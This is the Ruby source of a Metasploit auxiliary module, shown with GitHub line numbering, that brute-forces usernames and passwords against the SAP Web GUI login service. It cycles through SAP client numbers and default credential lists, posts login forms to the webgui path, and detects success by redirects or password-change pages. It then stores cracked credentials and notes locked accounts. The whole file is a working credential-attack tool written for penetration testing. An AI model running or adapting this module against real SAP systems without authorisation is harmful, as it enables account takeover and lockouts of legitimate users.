/
sap_web_gui_brute_login.rb
192 lines (178 loc) · 6.2 KB
/
sap_web_gui_brute_login.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy. I'd also like to thank Chris John Riley,
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'SAP Web GUI Login Brute Forcer',
'Description' => %q{
This module attempts to brute force SAP username and passwords through the SAP Web
GUI service. Default clients can be tested without needing to set a CLIENT. Common
and default user/password combinations can be tested just setting the DEFAULT_CRED
variable to true. The MSF_DATA_DIRECTORY/wordlists/sap_default.txt path store
stores these default combinations.
},
'References' =>
[
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'Author' =>
[
'nmonkee'
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8000),
OptString.new('TARGETURI', [true, 'URI', '/']),
OptString.new('CLIENT', [false, 'Client can be single (066), comma separated list (000,001,066) or range (000-999)', '000,001,066']),
OptBool.new('DEFAULT_CRED',[false, 'Check using the default password and username',true]),
OptString.new('USERPASS_FILE',[false, '',nil])
])
end
def run_host(ip)
uri = target_uri.to_s
if datastore['CLIENT'].nil?
print_status("Using default SAP client list")
client = ['000','001','066']
else
client = []
if datastore['CLIENT'] =~ /^\d{3},/
client = datastore['CLIENT'].split(/,/)
print_status("Brute forcing clients #{datastore['CLIENT']}")
elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/
array = datastore['CLIENT'].split(/-/)
client = (array.at(0)..array.at(1)).to_a
print_status("Brute forcing clients #{datastore['CLIENT']}")
elsif datastore['CLIENT'] =~ /^\d{3}\z/
client.push(datastore['CLIENT'])
print_status("Brute forcing client #{datastore['CLIENT']}")
else
print_status("Invalid CLIENT - using default SAP client list instead")
client = ['000','001','066']
end
end
saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default,
'Header' => "[SAP] Credentials",
'Prefix' => "\n",
'Postfix' => "\n",
'Indent' => 1,
'Columns' => ["host","port","client","user","pass"])
if datastore['DEFAULT_CRED']
credentials = extract_word_pair(Msf::Config.data_directory + '/wordlists/sap_default.txt')
credentials.each do |u, p|
client.each do |cli|
success = bruteforce(uri, u, p, cli)
if success
saptbl << [ rhost, rport, cli, u, p]
end
end
end
end
each_user_pass do |u, p|
client.each do |cli|
success = bruteforce(uri, u, p, cli)
if success
saptbl << [ rhost, rport, cli, u, p]
end
end
end
print(saptbl.to_s)
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def bruteforce(uri,user,pass,cli)
begin
path = "sap/bc/gui/sap/its/webgui/"
cookie = "Active=true; sap-usercontext=sap-language=EN&sap-client=#{cli}"
res = send_request_cgi({
'uri' => "#{uri}#{path}",
'method' => 'POST',
'cookie' => cookie,
'vars_post' => {
'sap-system-login-oninputprocessing' => 'onLogin',
'sap-urlscheme' => '',
'sap-system-login' => 'onLogin',
'sap-system-login-basic_auth' => '',
'sap-system-login-cookie_disabled' => '',
'sysid' => '',
'sap-client' => cli,
'sap-user' => user,
'sap-password' => pass,
'sap-language' => 'EN'
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error("[SAP] #{rhost}:#{rport} - Service failed to respond")
return false
end
if res and res.code == 302
report_cred(
ip: rhost,
port: rport,
service_name: 'sap_webgui',
user: user,
password: pass,
proof: "SAP Client: #{cli}"
)
return true
elsif res and res.code == 200
if res.body =~ /log on again/
return false
elsif res.body =~ /<title>Change Password - SAP Web Application Server<\/title>/
report_cred(
ip: rhost,
port: rport,
service_name: 'sap_webgui',
user: user,
password: pass,
proof: "SAP Client: #{cli}"
)
return true
elsif res.body =~ /Password logon no longer possible - too many failed attempts/
print_error("[SAP] #{rhost}:#{rport} - #{user} locked in client #{cli}")
return false
end
else
print_error("[SAP] #{rhost}:#{rport} - error trying #{user}/#{pass} against client #{cli}")
return false
end
end
end